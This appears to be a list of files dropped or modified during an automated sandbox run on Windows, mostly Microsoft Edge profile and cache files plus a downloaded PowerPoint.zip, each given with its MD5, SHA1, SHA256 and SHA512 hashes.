C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 091d33a5b3a1fb8085105ffd44943395
SHA1 d5a76cb90ce0c83dba768bd88f2a086641c50ebf
SHA256 edd69024357c79df726724f95f01f39ba1e21cc2b0384e5009bd22d6e1235224
SHA512 63deb7d7859347142763b7a5cdd1b8d45de49ea71398c46b0b8bfc0404b388b31c9036637d45cc0f917a0c35fb29a38381719a7c236c1c5ee4ab1f11da269e75

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c12b2c9e5254d89ad9762f9c388e86d7
SHA1 a80c6e00a3ff823583ccef4b3f5a473170fede5f
SHA256 9fbb51698e24bd558e8f54183aed8ab6bf8d463edb6da34a6b306731d296dbd7
SHA512 3247737c63ee5128f004ad1a60e0bcf8de78623777ece952c25e8544236cc0f360f348f7d3edc09a3f0f59868ad011c05cd8c637b0c3ac46837892269f99deb4

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1624005410\manifest.json

MD5 78b473ee6bb38cbb39886624887efe63
SHA1 d40fe3eba931ed08c8a68907ba20773a9987b3ce
SHA256 3a4a45d0995fcb759016fd1d875e1fc913a14236e8f7d3ae31930ee3f0477329
SHA512 92d03db5c60d0a805c896865e245e25ca43675677237e2dc38e82336cd3ac239e0dd878046d5bbfa50ec3206392857ac3305d64da6d1605e22b76a4f3e69ad18

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Typosquatting\2025.4.20.1\typosquatting_list.pb

MD5 488a70b7d4621e059e32d395221223aa
SHA1 774b5a2124f5c3d8d210020dc53e5033b04a5f76
SHA256 8c87afec8dba2f1a072c3fbecc7fa8fb81e93a64639bf9c00e24b4bb712b57a6
SHA512 bab1b4716e5faf0054cc93a969d1a79e6ee9d11d054d102afa0ba564142f444cbe9508aa013f118b701e4ca5283b0ef5a3a4859a67709a441bcbb8b25e78ca09

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 b26e61e78dd9c1f8ef75baa1170b3a19
SHA1 1e1e5eb6e992f219c82701e1744803e805b30d45
SHA256 748b9995a14348167839cc35723761fa45194ffbc929eb945177a78145f886e0
SHA512 29156be701eb9d631d3d3856113e59d8a2acbe9125d1b11e5d2701b41acb27ab1701efe671c4247199029376208a9098ec73f8134868d076de2430287b04d349

C:\Users\Admin\Downloads\PowerPoint.zip

MD5 196611c89b3b180d8a638d11d50926ed
SHA1 aa98b312dc0e9d7e59bef85b704ad87dc6c582d5
SHA256 4c10d3ddeba414775ebb5af4da5b7bb17ae52a92831fe09244f63c36b2c77f34
SHA512 19d60abf83b4a4fe5701e38e0c84f9492232ceb95b267ae5859c049cea12fee2328a5d26ffd850e38307fb10cb3955b7e5e49d916856c929442d45b87071d724

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 127405defb06cd76eb1462ebdd9ffc8c
SHA1 d93b891c62b7ae50cc7c2aba0fed3135340998c8
SHA256 f47e7c455de324e98f9f81b3bb739b976ee33daa266a7b9dbcdbe9e5a3128225
SHA512 ccae1f879a3aa8b62594eba26ed82161c7b1b5f079e43ece84f6644d9161d69c430c7d8555b9e191994bc67b21183980d17fcfd7349c010001249927717c3aa9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 73621e24337f619a1ed67f73ab638b41
SHA1 f1036944667ff7d721ff1ac186e958a4a36e5530
SHA256 b2a7a8119333fb86cd21423405b26e5e799ec77cd80fc0357fc90f9b2d7a56e4
SHA512 69c1bfe790e1c9f714a169c3a97eb51aa0cd60b0476a47e4113e6b39e26556fe6ae9e1913f8ca591da370d4457732919fd85581eb3b5d884f53d39fa6d17c747

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-as.hyb

MD5 8961fdd3db036dd43002659a4e4a7365
SHA1 7b2fa321d50d5417e6c8d48145e86d15b7ff8321
SHA256 c2784e33158a807135850f7125a7eaabe472b3cfc7afb82c74f02da69ea250fe
SHA512 531ecec11d296a1ab3faeb2c7ac619da9d80c1054a2ccee8a5a0cd996346fea2a2fee159ac5a8d79b46a764a2aa8e542d6a79d86b3d7dda461e41b19c9bebe92

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-hi.hyb

MD5 0807cf29fc4c5d7d87c1689eb2e0baaa
SHA1 d0914fb069469d47a36d339ca70164253fccf022
SHA256 f4df224d459fd111698dd5a13613c5bbf0ed11f04278d60230d028010eac0c42
SHA512 5324fd47c94f5804bfa1aa6df952949915896a3fc77dccaed0eeffeafe995ce087faef035aecea6b4c864a16ad32de00055f55260af974f2c41afff14dce00f3

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-nb.hyb

MD5 677edd1a17d50f0bd11783f58725d0e7
SHA1 98fedc5862c78f3b03daed1ff9efbe5e31c205ee
SHA256 c2771fbb1bfff7db5e267dc7a4505a9675c6b98cfe7a8f7ae5686d7a5a2b3dd0
SHA512 c368f6687fa8a2ef110fcb2b65df13f6a67feac7106014bd9ea9315f16e4d7f5cbc8b4a67ba2169c6909d49642d88ae2a0a9cd3f1eb889af326f29b379cfd3ff

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\manifest.json

MD5 2617c38bed67a4190fc499142b6f2867
SHA1 a37f0251cd6be0a6983d9a04193b773f86d31da1
SHA256 d571ef33b0e707571f10bb37b99a607d6f43afe33f53d15b4395b16ef3fda665
SHA512 b08053050692765f172142bad7afbcd038235275c923f3cd089d556251482b1081e53c4ad7367a1fb11ca927f2ad183dc63d31ccfbf85b0160cf76a31343a6d0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 fa41f7f296709be009a4a7d8b414f718
SHA1 262bb55a78eb5392749a8da724e8a4a4564b7e6d
SHA256 39a8a766ead966e4277df16c52a423e2cfa6a32d71775bd43243ce440ce83d66
SHA512 ca8d519e0725028ae69865fb64204c2bee286bcea28ab1cc440f689bed36a225590f366ca49068d9258a43e08a24b2284f6eaeaa3dc12c3e421c73bd9e3e4ec5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old

MD5 fb54696b11c872d9be7807dcb9e3fe45
SHA1 667ebe165cd9368177d82ec4d1967f7a035307de
SHA256 ad187a870d5e2eba50c150f52a21d99a12a281ecaf82905daf4e811992cb07e8
SHA512 e6e122bd74e99a545b2df6c665b796f57524674773636a170e507fa2e74b43cff8c0ff092e460204255f667a067f6b7906afbc3531e96483c61e276e1535451b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\672850e0-716b-4785-b971-03b7429b7632\index-dir\the-real-index~RFe5c4425.TMP

MD5 8391dcfdd268028d93f6d0636d999b79
SHA1 7b221f43e580dd400c4905ed7205d5233e7110c3
SHA256 12a910b7db201a46fecba3010a7a7c3721284263ea96e3129d37b2629030b5d7
SHA512 718b14cc3b527019fc0bb79f38b4aab50d913eabad9d82653a2856b466b8a84b40d7031a13f7e530ae44d45e25b8b440695873be04b3c86f39d8ed73731d0345

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\672850e0-716b-4785-b971-03b7429b7632\index-dir\the-real-index

MD5 f57c6058f0148c42c2ea53d93cf60515
SHA1 1f65659117e43d35b3365b7426d2e9e35fcf5fdb
SHA256 213a39545cc44325db3e3a56b7a8d1a8275967bdf9d93f3b463992424da144f1
SHA512 ec602155c35a6272970cf7fc402a6d86a1be37dae84f0786aa1c3069a3f718b0f0fc75f8198c9f0174395b0e5810aeae7839d4128b4f059a2c3dec957cc033cf

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_833700207\manifest.json

MD5 d20acf8558cf23f01769cf4aa61237e0
SHA1 c4b21384309b0ff177d9cd3aa4198ab327eb2993
SHA256 3493b321a7fc5e183ed6f223ae55ce962541717d0b332d16bdc7cbcadf7e6f78
SHA512 73d082cbd71f6d0f06c7afc1bf63ee41c9a8e501df3e56f21a551b2d369a0afc8306894c8e0a38d0324e2ac403ec506ac1ecd8e9b61a9cb27134a229ccb13725

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.76\LICENSE

MD5 aad9405766b20014ab3beb08b99536de
SHA1 486a379bdfeecdc99ed3f4617f35ae65babe9d47
SHA256 ed0f972d56566a96fb2f128a7b58091dfbf32dc365b975bc9318c9701677f44d
SHA512 bd9bf257306fdaff3f1e3e1fccb1f0d6a3181d436035124bd4953679d1af2cd5b4cc053b0e2ef17745ae44ae919cd8fd9663fbc0cd9ed36607e9b2472c206852

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.76\Filtering Rules

MD5 d7c9c6d2e1d9ae242d68a8316f41198c
SHA1 8d2ddccc88a10468e5bffad1bd377be82d053357
SHA256 f215127185b2ee6b01e12b6ca75d3e5c4e454598dd4aed36124ae13d59afd547
SHA512 7fd14824e9200dd99e1fd2cee402656dc0cfc3d0a60058c5eb05c68e9e65b7f0b47e550fb4d6c2b59eba204dbf3ef9e69dc9723b43a9b3ccd5412d6b77715fc3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

MD5 d2df1160aa82d0bc78529389c0ccb5e6
SHA1 1eab3797dbd302ca826e0fe64431ecc0e2290232
SHA256 57189f4f5e217ae4fd174edc10c2ed08ec38f9d80b263def715cf8e3ee209916
SHA512 994db6b70585dfccf879b77b9a75afe03241220240b925977901f72f6c93428f5c0d6c17cdf216956984b722ea1368e855cf4c680c86ccefbfdf0b03708bc104

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 b83077ed286e1701c06f94c410a272c5
SHA1 fb4e514c3cc4032c0d9101489b71b35fe2884acd
SHA256 f349e70a319d35784fff06af07d4bfe06d47cd59d683742e5f1f1c3c272a795b
SHA512 fe8dc83b1ca549e4b870935677167a4374733a81bee9ed695940321380a06e3f20e50fe8201989aecf15334ae5099d668a2b54e692fe02777398d8589b75353c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.1.39.0\edge_checkout_page_validator.js

MD5 1db0c159a8afc8073ed9f0a83f782ae8
SHA1 0874d03928cc347db7f5c7720fa6c23321671fb7
SHA256 f7ee28dee8d78ac7456a683cbc673e8b3b57bc9a1ba37c0d6d5d4332a7534d93
SHA512 4fda31e15918efa31ebbd69965e3fa1702daf6b1995af2c010a63e55030ee2f3affb4c45ea6275b7d4c35c0e61bdfbd3051872f392725394489b4c43e8cb3bf1

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_753594006\manifest.json

MD5 207f8230e8e90b79c9a957fcecb35037
SHA1 838fd6a9aa7ac1083a1b0cdaa29ed39e7e593a51
SHA256 fcd7d9808d01ba6f20fef9d34aa6dfaed249bfedf85cf12ce8299d58df3250a1
SHA512 8cf890bcb56d20f45a91b6d46940f7a5cf98307cd80ca05561704a2965f2984634dfd3a07d3aac089cbb2c8fafdf74b8152fc1f6c1404fe338c5eac4efa5f5f2

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\manifest.json

MD5 0d77c27baa669b0714c49b73e68447ea
SHA1 65103c9707e083c5503ad9979560ba1bb7634ae4
SHA256 c853d6a286d9d31a382c6d3fb109d5336d275651950f22b8243289eb6125b516
SHA512 1f011c405ec558229a1f5e2923b38b7054144c66d4c69d658c9c2c371f6cc365317485c274cafcab80bcb88f989b0be4c43c763933de3f86362a79ec1e962ff3

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Tokenized-Card\tokenized-card.bundle.js.LICENSE.txt

MD5 8595bdd96ab7d24cc60eb749ce1b8b82
SHA1 3b612cc3d05e372c5ac91124f3756bbf099b378d
SHA256 363f376ab7893c808866a830fafbcd96ae6be93ec7a85fabf52246273cf56831
SHA512 555c0c384b6fcfc2311b47c0b07f8e34243de528cf1891e74546b6f4cda338d75c2e2392827372dc39e668ed4c2fd1a02112d8136d2364f9cab9ee4fa1bd87f5

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Notification\notification_fast.bundle.js.LICENSE.txt

MD5 7bf61e84e614585030a26b0b148f4d79
SHA1 c4ffbc5c6aa599e578d3f5524a59a99228eea400
SHA256 38ed54eb53300fdb6e997c39c9fc83a224a1fd9fa06a0b6d200aa12ea278c179
SHA512 ca5f2d3a4f200371927c265b9fb91b8bcd0fbad711559f796f77b695b9038638f763a040024ed185e67be3a7b58fab22a6f8114e73fdbd1cccdda6ef94ff88f3

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-tokenized-card\fr-CA\strings.json

MD5 cd247582beb274ca64f720aa588ffbc0
SHA1 4aaeef0905e67b490d4a9508ed5d4a406263ed9c
SHA256 c67b555372582b07df86a6ce3329a854e349ba9525d7be0672517bab0ac14db5
SHA512 bf8fa4bd7c84038fae9eddb483ae4a31d847d5d47b408b3ea84d46d564f15dfc2bae6256eac4a852dd1c4ad8e58bc542e3df30396be05f30ed07e489ebe52895

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-tokenization-config.json

MD5 ae3bd0f89f8a8cdeb1ea6eea1636cbdd
SHA1 1801bc211e260ba8f8099727ea820ecf636c684a
SHA256 0088d5ebd8360ad66bd7bcc80b9754939775d4118cb7605fc1f514c707f0e20d
SHA512 69aff97091813d9d400bb332426c36e6b133a4b571b521e8fb6ad1a2b8124a3c5da8f3a9c52b8840152cf7adbd2ac653102aa2210632aa64b129cf7704d5b4fa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-notification-config.json

MD5 4cdefd9eb040c2755db20aa8ea5ee8f7
SHA1 f649fcd1c12c26fb90906c4c2ec0a9127af275f4
SHA256 bb26ce6fe9416918e9f92fcc4a6fe8a641eceea54985356637991cf6d768f9fd
SHA512 7e23b91eab88c472eec664f7254c5513fc5de78e2e0151b0bcc86c3cd0bf2cb5d8bb0345d27afdd9f8fcb10be96feaa753f09e301fa92b8d76f4300600577209

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-stable.json

MD5 05f65948a88bd669597fc3b4e225ecae
SHA1 5397b14065e49ff908c66c51fc09f53fff7caed7
SHA256 0e329e63d8457bef61d0986a521f81d747a09dadf3b1136f2011942ba14d9fc0
SHA512 ed7b767a741d18c0dd35e0311db752120e0f090d39ef976d541cbc5ae78fa32655cb3f9c27cddef6ca8091ca8bf31513254a748bc8b95353897f6198a667cf58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-checkout-eligible-sites.json

MD5 16d41ebc643fd34addf3704a3be1acdd
SHA1 b7fadc8afa56fbf4026b8c176112632c63be58a0
SHA256 b962497993e2cd24039474bc84be430f8f6e6ab0f52010e90351dc3ff259336c
SHA512 8d58aa30613a2376ccc729278d166a9b3ec87eca95544b9dec1ee9300e7dd987326ea42d05dca3f1cc08186685f2fdaf53c24fd2b756c1ed9f2b46436689dc74

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 0f0a8acf10a0b763d66c23bead07528c
SHA1 92bf04a3ea58ce76862db2cf004bbb704b997b05
SHA256 50b6b3ebed85e3a64e0b2ab0f47afa074e6189f28c4ad73b279e1549b594e069
SHA512 3f1f7ba26e5c6e114303a3bf54bb75b7cf0931a1e0cb7116dafd64c1061f09323ead6f5732776eeb9fae64f5ea5d9b390c74b7dd5da38e54d478665b8fa5a7d4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\wallet_donation_driver.js

MD5 03abcce3f9828372d9876aa2e6fcdbb0
SHA1 cf5834e1af5f7143e62a29ae0f7ede79178b3574
SHA256 39a63d56be4f1ca950310f385e8a42f7bc2dcc0e49fefff306176182bfa4f0e5
SHA512 ef9b7decb4cfee3961006ea5c77299a48fe6a667475772f2a78e93bd4f691dc4700f8008138c574898fdcd8d717d84b8b201527ddb5a61346e05d362aeb15701

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008a

MD5 1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5
SHA1 6dd8803e59949c985d6a9df2f26c833041a5178c
SHA256 af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725
SHA512 b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008c

MD5 638b28824ff7d2a8b5eca31267ffaf3d
SHA1 51c91fb5de5248d6dbbe194565231c4bbbc197fb
SHA256 a2477313b8f9735a83fff20ff6624d26a13c893601a3cf6148bc997022913011
SHA512 0eb506d4d9f7bf3aef60dc2d69135a1eb6c9748eca15f721cf5310a7bfe131e21c3504dd75ad986ddfcde907cedd8522caa64845de1794000c2fe7a477189af5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008d

MD5 d6b36c7d4b06f140f860ddc91a4c659c
SHA1 ccf16571637b8d3e4c9423688c5bd06167bfb9e9
SHA256 34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92
SHA512 2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008b

MD5 226541550a51911c375216f718493f65
SHA1 f6e608468401f9384cabdef45ca19e2afacc84bd
SHA256 caecff4179910ce0ff470f9fa9eb4349e8fb717fa1432cf19987450a4e1ef4a5
SHA512 2947b309f15e0e321beb9506861883fde8391c6f6140178c7e6ee7750d6418266360c335477cae0b067a6a6d86935ec5f7acdfdacc9edffa8b04ec71be210516

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\buynow_driver.js

MD5 412352a121a62092628029e9b30158d8
SHA1 0021445df04bcd60cd83b670ce1863c42f1f4c11
SHA256 87339a1e25ccbbf120f294fd60333e292e1d631e785a9b205ed5beb0128c214f
SHA512 ffd266f1161ab996f38a6d0723e2cf96840b500cf2aa360f48b7953d448a5cd3a2fffa666d9be9c89dc4495497d5016f1199e6419a82bdf18fc99b8a8a4eb596

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\2\IndexedDB\indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\2\CacheStorage\index.txt

MD5 3d808252a67266ad038ea9e05fe325de
SHA1 6d1c39708e40e95bdb7fb3ea6bc91cf43cd7abf1
SHA256 4d415b05a71d85889c56c52e4c91a33d3d2477afbdf9fec3efcd471ca38a53aa
SHA512 1cea36f795648d06b3ffa39df852270a3144c90f95d386b766463814737a00dda5aa376ee7537e3f155569977cb130457057cdb91b7fe8395ba9a9d880a7d325

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\2\CacheStorage\index.txt~RFe5e5cb4.TMP

MD5 892e458ef1476ac2e2d85e9740f881f7
SHA1 b79799798320c8ac61150087b14de74c01ed6674
SHA256 f00624a269e3d08be97d19d39f38012931363c9d10a387563d77e1604900153f
SHA512 86d24788e55831165014b4a1625753b818843d93530bd5ca008a32d1b769e7c017726fe0c35d8250ded922ca5a4d34e8bf13ffa122ed91444f518825dd67f89d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 22551d72e4cc7d0ba995c3993620da4a
SHA1 386de6159268ce6ff2411b0c8ee26851c7ae037f
SHA256 46887716e0c3496aa751ad53efb07714afb51cc4ad2d0e60f43549b253b616ae
SHA512 348543fea1b84094a7030ed29c9a1bc3a3e93ffa24607a7adaba3944a4587f85012d787e538615ddbb4133657dddf6622e53d651aaace9625c11c368fb170ae4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 704398457cb42d514204fc139cd6f4f4
SHA1 289f2d934dd30904cfdd51fbb1e9f939470c555a
SHA256 d046ceb25e45a709b6c758ca054b02b3e5f298a2f869fa15326e5e7e9a265ec5
SHA512 ca2994c7070af8a3866d15a50f829152e81b68401a51aba7c9a4afce4ac52b9f75aef002eaf76cfac55688051dd4eaa6d72b8d55b9089f1fca09ac141b4b5ebd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 049daf7df4181ab63b6b2cb3b40bd70a
SHA1 12173641a74edd27236d163fb2592dd6f64f10b5
SHA256 74e43f6f71eb638a4e329ac374c495508556069b56a0ff605c3e3d33d300d15e
SHA512 0e2db85d95d006bb05b9778f32ee403051d062e0ff5f9fdb540c4abbb920a47d034963aebb6bbd360656535798317b58e7af02ebe6113d4cff58c037f338b6ad

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_536417775\manifest.json

MD5 578c9dbc62724b9d481ec9484a347b37
SHA1 a6f5a3884fd37b7f04f93147f9498c11ed5c2c2d
SHA256 005a2386e5da2e6a5975f1180fe9b325da57c61c0b4f1b853b8bcf66ec98f0a0
SHA512 2060eb35fb0015926915f603c8e1742b448a21c5a794f9ec2bebd04e170184c60a31cee0682f4fd48b65cff6ade70befd77ba0446cc42d6fe1de68d93b8ea640

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 6640a5e8de164dc093d4c5a631532455
SHA1 f1eeacd4f5d8a08ad2433d8694225753cf0ec9f4
SHA256 89e38712636642deacb9bbe1c17d8fdf7f5054a475a3385117a26a9551951083
SHA512 9de934ac95e67ae38f22c4868f92fed463e2dfeffd25a1855a9b20a38a42334d31a0067a6ccef39fe6cfe771e5167fca52a69a8a0da508185931c98f0062bf3b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 adfb0b5b12d3ac892881683f2c4bed99
SHA1 300286ad057480e0ae5910614e9657b8b9f15f4b
SHA256 56b8221dc690b6e6cc9788a3bcdb96ad4835a301b2dc58848dbfb9bb6a530321
SHA512 d9b7f9f43740509f8c45c772fce11af7c86e717cd2c344e79017f53c81cb07b24836a2e6d2913de63337bd03e3993e5884c35708c6ee4ee991e59bddcd3497f4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 90fb417f6ead5a910149fceaa587cf3e
SHA1 a3905223834a328f7095560d2e0b22501f1deffc
SHA256 75a390c2f4f771389b60f007a8a5cc8cea15b540be46176dc02163ed51dd0aa7
SHA512 f651fb4ab0f0f5c8f6393a7e76fe5b6761e700120dcf40e7316d86ffa5908a4d9cfe4fd7fcc85b3b203624381b7ab154752fa324beb30bf1e2a1a3722a465627

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 36d977da4504fd1e344daf13046b617c
SHA1 25f1fda21f28b9100f746107e766600d53100d99
SHA256 add00d8a0ec6f512a0baa5adc06e384a6b0a1ddf8ae8e785bd26dc481acc0fec
SHA512 81ff0c05af3c205ff74bb11ff9fc78b75013d7b444e0b4de0b56372aaf6f5835142c4267dedf3061c025c5f986ef3773ab026a6e939603dd2e3be35fb11c7372

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\4\IndexedDB\indexeddb.leveldb\MANIFEST-000001

MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA512 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000089

MD5 454dbaea6069ee3f7891857e12cc7501
SHA1 925a86583804c24b93289ca072bf7c557090d64e
SHA256 bd9bfbad4af10b2c7d81d626b2f10085c930bdd5d0f7ab7b292e139d46fae005
SHA512 a62d9833213f5c26c0dc04074f946f94a3f928b5cb0f7f77555518047a0f8c26533fe730fe7b6c032e5179d1d06529d05e388076987b58c50501c260ad4b6335

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008e

MD5 247cd48f026e822b7a0e8658ee51d762
SHA1 b45400bce80335b6c5735721a9e833e74cf1766c
SHA256 37c8a7a24c0cb46f65738352529bdd564ae1de338754d4a6097e2ba0822ecee8
SHA512 9e8c408c18b495718df0dcb99d521219d2cde98f24614ff60b9bfb6f7a7083d55c11bca8f01c2db9dc225b802c7d8e141dd3e70d9bb001fbe3e28859a5bf7d7c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 df7c1d8552c63bee63834adeb28ca67e
SHA1 c7921b96a152245e9c21d2cd9cd9d97750a72972
SHA256 3a3dfff3307af936950dbff27aa885129263573906bda4c3660f9ea011f02c7e
SHA512 c0f9749c568cb2d96684b2e1fd26abfec94a867692cb3261d661f2ad2316097025531dbb126f256b49e3c07175055a02c1b1f54932b4a818f8e18772822f76df

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\61a0b4d20ae0e222_0

MD5 2791929259a3964bfe5e754564e4ba37
SHA1 527cda68a668949ad99a0fd3dc9a379d8d0f7e77
SHA256 c248d755749eaa6c0aa41f1af19dedf6511a7c7b1f13152b328659986abd0809
SHA512 db522cf8aacf6b97880b8fc038b595b69d43d685547d0b8991ab8668ee85eba23b1ad2a4e373d7a1e8dc8e9e16f9a317499d1643730f5c58de0fa0b817362b9f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 73f5ec39582fb806b28815047ef26cc4
SHA1 f9c4134ffa03b03ea903d004f56c45707d076d81
SHA256 5ed287a26762b420f124eaf177d7b1387f422b1997843d62c34bc23f9c1f291e
SHA512 8008bdeb1cf5fc120db9dff87a3b449dc9e0003ee9bd696f581273e5428d66b75efdfad4e2afef0a868bbbc4c774794c7c54f3f5ea085711429e1dd8e64117bb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 450345332215a504fff218184a8d649b
SHA1 1d9357c63c4f45ac8c754b69bf709bf998f59a75
SHA256 857325061d1708e67536c1fe95b6588908312b67fec9f237d2f09e5175c80ae3
SHA512 09bca000d9c4a25b14be0fcd16a1f21a46315237ea0063b1736de9a007fdb4c919c221896513f41941ace3fa3339d1a3bf8a95aad7e22153aa7b505a47d938d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7f903dcbe069fdcb_0

MD5 6a672fe8db58b70a51cf7665389799a6
SHA1 45c173ad9a244c245d08789a84e0c8548e7c7a25
SHA256 22b8f7a625745deaf550baea072e24ece8847634b14165698884b564215d0f4b
SHA512 664a4eb8c7a85fa96debeb499dea419eb911fc4a6ea019d43343122ed7e466ac7dfd95e937ed120f60e41f1bd9bec5ab346a303244964575c5cb6268ac1d2d47

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\71ae8a0853fb333a_0

MD5 5a502c5eb8e93d24416c25806260e8b6
SHA1 d540c78e8e26117f9e829d73621a050c0b22b474
SHA256 fea9b5aa226582a76e6f8c55f399507aa06e9aa9cc87dac081592148d472280b
SHA512 473ab5e6c6860373e1bac29fdb1c2e1e1d9dc0a9f7306aa2b48852a61f55afe59c55b368839a97f0c169b973caee66924e4eb5f9d4151905433ada01463b4db3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\65e2e0df5617c5f3_0

MD5 d03cae4854692cad26beb27898d512ac
SHA1 6bfd53d5b1739b7e4a36e9a06d172cd6d07da28e
SHA256 9ef8e494c296736bd1e94b950dba60d8bb80c89619f3671c0fff4521caa5fc25
SHA512 40106f39bf45d0c43aa06e8081aaf646323cba034d208e2e15ae5b2863cefcdfec69dc50fc07a3b4bd3b95526a9503c8384b46eab8dfda26e95dc6fb8c568a3b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b1726c76ce6b4784_0

MD5 dfe07fa2fcc9cb95d69e964eb8c7b860
SHA1 0c969d412b47501b31e3aa0c3c9c63299518e886
SHA256 5ffe5ae10fb30f08537b28d63714ee4b20d00c1170f33e34d7eba69cfca85437
SHA512 d8cd28ee5d506a688cd5d6a80a698ecc7c2339c0b1825ef5af81f8e2a6552372dcb590d39d3f7c80909b9251c2f058528eaaf0c6ce4c86a5ba7a1a23369661b6

